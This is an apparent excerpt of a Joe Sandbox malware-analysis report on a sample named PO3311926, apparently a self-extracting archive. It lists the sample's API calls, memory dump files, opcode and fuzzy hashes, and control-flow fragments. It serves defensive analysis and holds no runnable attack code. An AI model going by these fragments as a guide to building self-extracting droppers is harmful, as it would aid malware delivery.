                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BBAC66
                                                                                              • SHGetMalloc.SHELL32(00BE8438), ref: 00BBAC70
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll
                                                                                              • API String ID: 3498096277-3360196438
                                                                                              • Opcode ID: 0757ee1c1de729f29a24d344001fa7459793979332f8272ab1b395851b9325fd
                                                                                              • Instruction ID: fef7077694ef21301e4f62d980ff61020ded35e5248011883a152df3b7a01e1f
                                                                                              • Opcode Fuzzy Hash: 0757ee1c1de729f29a24d344001fa7459793979332f8272ab1b395851b9325fd
                                                                                              • Instruction Fuzzy Hash: E4F0F9B1900249ABCB10AFAAD849AEFFFFCEF84704F00415AA415A2251DBB45605CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1133 bbdbde-bbdc09 call bbec50 SetEnvironmentVariableW call bb0371 1137 bbdc0e-bbdc12 1133->1137 1138 bbdc36-bbdc38 1137->1138 1139 bbdc14-bbdc18 1137->1139 1140 bbdc21-bbdc28 call bb048d 1139->1140 1143 bbdc1a-bbdc20 1140->1143 1144 bbdc2a-bbdc30 SetEnvironmentVariableW 1140->1144 1143->1140 1144->1138
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BBDBF4
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BBDC30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: 4ccec90ad105cda20e6a52fa2063a95d1aff73d73318f589d87caa2c7c308d48
                                                                                              • Instruction ID: efa247f17831a72f4ae519590484f354d1f3af02eaade027216143343029bade
                                                                                              • Opcode Fuzzy Hash: 4ccec90ad105cda20e6a52fa2063a95d1aff73d73318f589d87caa2c7c308d48
                                                                                              • Instruction Fuzzy Hash: 9EF0EC7240523567CB202F94CC06FFB7FE8EF05B81B0404D2BD85A6161F6F48980D6B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00BA9795
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00BA97AD
                                                                                              • GetLastError.KERNEL32 ref: 00BA97DF
                                                                                              • GetLastError.KERNEL32 ref: 00BA97FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: 2ad0c85af20936b248c6d9a0ce689665ecda0b66fd100cd3f77b4d322938114b
                                                                                              • Instruction ID: 466bef8dc5aee4e0e10a1b83d40a00a094b9dabf2a145109b72cac351ecdd77c
                                                                                              • Opcode Fuzzy Hash: 2ad0c85af20936b248c6d9a0ce689665ecda0b66fd100cd3f77b4d322938114b
                                                                                              • Instruction Fuzzy Hash: 5811A530918204EBDF205F64C84466D77E9FB43BA0F2085AAF416C6190E778DE44FB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00BC40EF,00000000,00000000,?,00BCACDB,00BC40EF,00000000,00000000,00000000,?,00BCAED8,00000006,FlsSetValue), ref: 00BCAD66
                                                                                              • GetLastError.KERNEL32(?,00BCACDB,00BC40EF,00000000,00000000,00000000,?,00BCAED8,00000006,FlsSetValue,00BD7970,FlsSetValue,00000000,00000364,?,00BC98B7), ref: 00BCAD72
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BCACDB,00BC40EF,00000000,00000000,00000000,?,00BCAED8,00000006,FlsSetValue,00BD7970,FlsSetValue,00000000), ref: 00BCAD80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: ab8716e799e4bde0a499cd85fef80186b1ddf08baf34835961f808a59aa9f316
                                                                                              • Instruction ID: a42bbfbbc544b30fa001854c401578d02675866499aed6b347a3e3d8643144c2
                                                                                              • Opcode Fuzzy Hash: ab8716e799e4bde0a499cd85fef80186b1ddf08baf34835961f808a59aa9f316
                                                                                              • Instruction Fuzzy Hash: CE01283270222AABC7214E689C94F56BBD8EF00B667110279F807D3560EF20CC0186E2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00BB1043
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00BB108A
                                                                                                • Part of subcall function 00BA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA6C54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              • Opcode ID: 210f3ea6ef5cc1c87b034ad8e1a1aee3799d6205ed94c836ed3a634ebc5874fc
                                                                                              • Instruction ID: 570f06c20b84f76ac6b3f61b18ea67389ca78967315c4c5d130ee4caec5ab632
                                                                                              • Opcode Fuzzy Hash: 210f3ea6ef5cc1c87b034ad8e1a1aee3799d6205ed94c836ed3a634ebc5874fc
                                                                                              • Instruction Fuzzy Hash: 3F01DBB53443496BD330AF6C9C61BB6B3E8EB40751F6008AEF58656181DEF1A8844624
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BAC29A: _wcslen.LIBCMT ref: 00BAC2A2
                                                                                                • Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB1FE5
                                                                                                • Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB1FF6
                                                                                                • Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB2006
                                                                                                • Part of subcall function 00BB1FDD: _wcslen.LIBCMT ref: 00BB2014
                                                                                                • Part of subcall function 00BB1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BAB371,?,?,00000000,?,?,?), ref: 00BB202F
                                                                                                • Part of subcall function 00BBAC04: SetCurrentDirectoryW.KERNELBASE(?,00BBAE72,C:\Users\user\Desktop,00000000,00BE946A,00000006), ref: 00BBAC08
                                                                                              • _wcslen.LIBCMT ref: 00BBAE8B
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00BE946A,00000006), ref: 00BBAEC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 1016385243-1876063424
                                                                                              • Opcode ID: 781bb1eee5f46a5fd2694cadb24da0b5b9b6ebb3de12abdf1090a0e62a1a80b0
                                                                                              • Instruction ID: 7f221e89fb46b192d00cc07aec8d6679b1f38c9e87c10785910066bea61937d7
                                                                                              • Opcode Fuzzy Hash: 781bb1eee5f46a5fd2694cadb24da0b5b9b6ebb3de12abdf1090a0e62a1a80b0
                                                                                              • Instruction Fuzzy Hash: A6011E71D0025966DF21ABA4DD0AEFE77FCEF09704F0004A5F506E3192EAF4D6448AA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00BAD343,00000001,?,?,?,00000000,00BB551D,?,?,?), ref: 00BA9F9E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00BB551D,?,?,?,?,?,00BB4FC7,?), ref: 00BA9FE5
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00BAD343,00000001,?,?), ref: 00BAA011
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: 7fb8caefc109b4e1c2c4440113bceae3d0207c1701c891869f4a0af7d0f4c022
                                                                                              • Instruction ID: 1fa6601705f6d629f352e31c42f55cf21ecfbd5b77a77636ecf6c9d617c28699
                                                                                              • Opcode Fuzzy Hash: 7fb8caefc109b4e1c2c4440113bceae3d0207c1701c891869f4a0af7d0f4c022
                                                                                              • Instruction Fuzzy Hash: 6531D131208345AFDB24CF24D858B6EB7E5FF86B11F04495DF98197290CB76AD48CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BAC27E: _wcslen.LIBCMT ref: 00BAC284
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA2D9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA30C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              • Opcode ID: 1764bd771b448db6109813bc232122fe817a88f44f82063f027c20f24c2bb21b
                                                                                              • Instruction ID: 19f2194dbb1a46c032f66d12adbf1a60db936db183d478850df9fec41e2d76d8
                                                                                              • Opcode Fuzzy Hash: 1764bd771b448db6109813bc232122fe817a88f44f82063f027c20f24c2bb21b
                                                                                              • Instruction Fuzzy Hash: 1C01B1312092106AEF31AB758C59BFD77C8EF0B781F044495F902E6092EB64CA81C6BB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BCB8B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: e08edd8711752ce3970570afa97217fe3ab71d5e08c9519b9fd5bd17f1fb31aa
                                                                                              • Instruction ID: 3c39e43cc98900bffa270684238dfa1580987473bad14f6a8c5a1d4360bf98c7
                                                                                              • Opcode Fuzzy Hash: e08edd8711752ce3970570afa97217fe3ab71d5e08c9519b9fd5bd17f1fb31aa
                                                                                              • Instruction Fuzzy Hash: 0741F57050428C9ADF228E688C85FFABBE9EB55304F1404EDE6DAC7142D775AA458B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00BCAFDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 35de2692b3ea1af01b8d147108b4c95253d2506ac950f1b2a0b04b12bb9d1e8b
                                                                                              • Instruction ID: 1167552d331b83933e1b1fc9958c85a37559971109266d38029ee4e6b6b8b1f8
                                                                                              • Opcode Fuzzy Hash: 35de2692b3ea1af01b8d147108b4c95253d2506ac950f1b2a0b04b12bb9d1e8b
                                                                                              • Instruction Fuzzy Hash: 7E014C3254510DBBCF125F90DC15DEEBFA2EF08754F01419AFE1466271DA768931EB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BCA56F), ref: 00BCAF55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: 18b00524f4bfd4c9a74a1676763b5dc7b085567a60ad976b8cd374e55d0f23e5
                                                                                              • Instruction ID: 6184f814fdf903aa84fe03276cb01d0d90d9fb0d9f00b962612333f27c99cd56
                                                                                              • Opcode Fuzzy Hash: 18b00524f4bfd4c9a74a1676763b5dc7b085567a60ad976b8cd374e55d0f23e5
                                                                                              • Instruction Fuzzy Hash: 85F0BB3254611CBBCB115F50CC15DADFFD1DF04B11B40409AFC1897260FE714E10978A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: 24eb71b8ca90aeee4a4b466f6f5eda5a376bf2135734f9ce19ae4cc2cea01740
                                                                                              • Instruction ID: 9a727d115148b841bd0b2b46621588d1d4d4a76f630aabbe2fba41e985211f4d
                                                                                              • Opcode Fuzzy Hash: 24eb71b8ca90aeee4a4b466f6f5eda5a376bf2135734f9ce19ae4cc2cea01740
                                                                                              • Instruction Fuzzy Hash: 45E05532A8221D7BC200AB64CC22EAEFBD0CB04B21B4000EAF805A7350FD744E0086CA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BCBA44,?), ref: 00BCB7E6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BCBA89,?,00000000), ref: 00BCBC64
                                                                                              • GetCPInfo.KERNEL32(00000000,00BCBA89,?,?,?,00BCBA89,?,00000000), ref: 00BCBC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: a754d28a7d1a3b672527e5788a6d230079584e2ae98f120e7011b38c6ecf3b26
                                                                                              • Instruction ID: 1e69f512a95741d4dcd83b3009942713674024ddb533a2a706249ce1a0f7a0ab
                                                                                              • Opcode Fuzzy Hash: a754d28a7d1a3b672527e5788a6d230079584e2ae98f120e7011b38c6ecf3b26
                                                                                              • Instruction Fuzzy Hash: 235111709002459EDB209F75C892FBFBBE4EF41310F1840FED4969B252EB359945CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00BA9A50,?,?,00000000,?,?,00BA8CBC,?), ref: 00BA9BAB
                                                                                              • GetLastError.KERNEL32(?,00000000,00BA8411,-00009570,00000000,000007F3), ref: 00BA9BB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: e2370dc864f529d24c95c97af5c70c1b51be0d26b9c63332b34d657240071ced
                                                                                              • Instruction ID: bc3fc24e9c93bde519afc87889e632e8bd52a05404c035309c51aa9ac759c1f9
                                                                                              • Opcode Fuzzy Hash: e2370dc864f529d24c95c97af5c70c1b51be0d26b9c63332b34d657240071ced
                                                                                              • Instruction Fuzzy Hash: 3241E13060C3018FDB24DF15E58456AF7E5FFD6720F548AAEE89283260D770ED44AB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA1E55
                                                                                                • Part of subcall function 00BA3BBA: __EH_prolog.LIBCMT ref: 00BA3BBF
                                                                                              • _wcslen.LIBCMT ref: 00BA1EFD
                                                                                              Memory Dump Source
